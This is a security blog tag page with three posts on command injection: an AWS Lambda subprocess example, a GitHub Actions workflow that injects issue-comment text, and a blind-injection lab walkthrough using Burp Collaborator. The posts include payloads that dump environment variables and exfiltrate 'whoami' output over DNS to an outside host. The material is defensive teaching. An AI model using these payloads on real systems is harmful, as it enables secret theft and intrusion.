Skip to content

Tag: Command Injection

AWS Lambda (Python) – Preventing Command Injection

When writing a AWS lambda function, we need to be careful about secure coding issues.

If your lambda function takes an input and use it to run a command, you need to avoid using os.system(...). You should use subprocess.run(...) but without the shell. The commands provided to subprocess should be in arguments.

Explaining the injection

I will use an example of AWS Lambda function that takes an input from event and uses it in a subprocess to run a command. Notice the command is used in a f-string.

import subprocess
import uuid

def lambda_handler(event, context):
    rand_value = uuid.uuid4().hex[:6]
    file_name = f'{event['file_name']}_{rand_value}'
    print('Creating:', file_name)

    result = subprocess.run(f'cd /tmp && touch {file_name} && ls -la', shell=True, stdout=subprocess.PIPE)
    print(result.stdout.decode('utf-8'))

We can inject a malicious filename to steal the values in env

ubuntu@ubuntu-virtual-machine:~$ python3 command_injection.py
Enter file name: hello && env | base64 #
Creating: hello && env | base64 #_526feb
R0pTX0RFQlVHX1RPUElDUz1KUyBFUlJPUjtKUyBMT0cKTEVTU09QRU49fCAvdXNyL2Jpbi9sZXNzcGlwZSAlcwpVU0VSPXVidW50dQpTU0hfQUdFTlRfUElEPTE0MDIKWERHX1NFU1NJT05fVFlQRT14MTEKU0hMVkw9MQpIT01FPS9ob21lL3VidW50dQpPTERQV0Q9L2hvbWUvdWJ1bnR1CkRFU0tUT1BfU0VTU0lPTj11YnVudHUKR05PTUVfU0hFTExfU0VTU0lPTl9NT0RFPXVidW50dQpHVEtfTU9EVUxFUz1nYWlsOmF0ay1icmlkZ2UKTUFOQUdFUlBJRD0xMDI5CkRCVVNfU0VTU0lPTl9CVVNfQUREUkVTUz11bml4OnBhdGg9L[...]

Defence

We should refactor the vulnerable code by adding two defences:

Input validation

Dependings on the context, try to whitelist the allowed characters.

If you do not know in advanced then it is crucial that you follow the next defence of using arguments command for subprocess.

Usage of arguments in subprocess

Instead of providing the commands in concatenated string or string format, provide an argument format ['touch', file_name]. This means you need to break down the command in different `subprocess` calls. You cannot run the multiple commands in one single subprocess.

One common routine is that you need to run a sequence of command at a specific same directory. With the use of cwd argument in subprocess.run(...), you can specify where the command should be executed.

import subprocess
import uuid

def lambda_handler(event, context):
    rand_value = uuid.uuid4().hex[:6]
    file_name = f'{event['file_name']}_{rand_value}'
    print('Creating:', file_name)

    working_dir = '/tmp'
    subprocess.run(['touch', file_name], cwd=working_dir, stdout=subprocess.PIPE)
    result = subprocess.run(['ls', '-la'], cwd=working_dir, stdout=subprocess.PIPE)
    print(result.stdout.decode('utf-8'))

GH Actions Misconfiguration – causing Command Injection

Suppose you have a Github Actions script like below:

The script will be triggered when a new issue comment is added to the issue or a comment is edited.

name: GitHub Actions Demo
on:
  issue_comment:
    types: [created, edited]
jobs:
  Explore-GitHub-Actions:
    runs-on: ubuntu-latest
    steps:
      - run: echo "🎉 The job was automatically triggered by a ${{ github.event_name }} event."
      - run: echo "🐧 This job is now running on a ${{ runner.os }} server hosted by GitHub!"
      - run: echo "🔎 The name of your branch is ${{ github.ref }} and your repository is ${{ github.repository }}."
      - run: echo ${{ github.event.comment.body }}

Notice that ${{ github.event.comment.body }} is used in the run step directly? This makes the script vulnerable to Command Injection. Why?

Read this: https://securitylab.github.com/research/github-actions-untrusted-input/#remediation

In this context, someone can inject commands to the GH Action script by adding their payload to the issue comment. The GH Action script is triggered every time there is a new issue comment.

Did you notice we can run echo bye? This is just a simple example but worse scenario can be reverse-shell (if you are using self-hosted GH Runners) or secrets theft.

See that we can echo bye

You can even attack in a stealth mode by deleting the comment immediately once the workflow is triggered.

How to prevent the issue?

Set the github context data in env variable before you use it in the run

[...]
      - env: # Add this
          BODY: ${{ github.event.comment.body }} # Add this
        run: echo "$BODY"

Add a new comment that contains a payload:

You can see the script is interpreting the comment body as string rather than interpolating it as a command to execute.

Testing Blind Command Injection with Burp Collaborator

Recently, I was doing a few labs on Command Injection. It was mentioned that in most situation, the tester will not be able to see the response of the injected command. Therefore, alternative ways will need to be explored to check if the Blind Command Injection exists in the web application.

One of the ways that we can validate the existence of the Blind Command injection is to inject a nslookup command. In this scenario, we can use Burp Collaborator to validate if the web application has performed a DNS lookup. Please refer to this lab for more details.

First, you will need to click “Copy to clipboard” in the Burp Collaborator client. Insert the copied URL into the vulnerable parameter. Send this request to the web server.

Payload: & nslookup <INSERT BURP COLLABORATOR URL HERE> &
Example: & nslookup abcde1234.burpcollaborator.net. &

Secondly, you can click “Poll now” in the Burp Collaborator client. If there is a new DNS lookup appearing, it means that the Blind Command Injection is working.

In addition, you can also extract the output of the command using the below payload:

& nslookup `whoami`.<INSERT BURP COLLABORATOR URL HERE> &

In Burp Collaborator, we can see that there was a DNS lookup to the domain (containing the whoami result).